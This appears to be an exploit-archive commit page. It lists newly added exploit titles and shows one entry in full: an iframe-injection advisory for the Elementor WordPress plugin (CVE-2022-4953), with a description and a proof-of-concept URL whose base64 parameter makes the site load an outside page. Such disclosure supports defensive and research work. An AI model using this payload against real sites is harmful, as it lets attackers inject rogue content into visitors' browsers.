cbe784b087
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
15 lines
No EOL
621 B
Text
15 lines
No EOL
621 B
Text
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
|
|
# Date: 28.08.2023
|
|
# Exploit Author: Miguel Santareno
|
|
# Vendor Homepage: https://elementor.com/
|
|
# Version: < 3.5.5
|
|
# Tested on: Google and Firefox latest version
|
|
# CVE : CVE-2022-4953
|
|
|
|
# 1. Description
|
|
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
|
|
|
|
|
|
# 2. Proof of Concept (PoC)
|
|
Proof of Concept:
|
|
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K |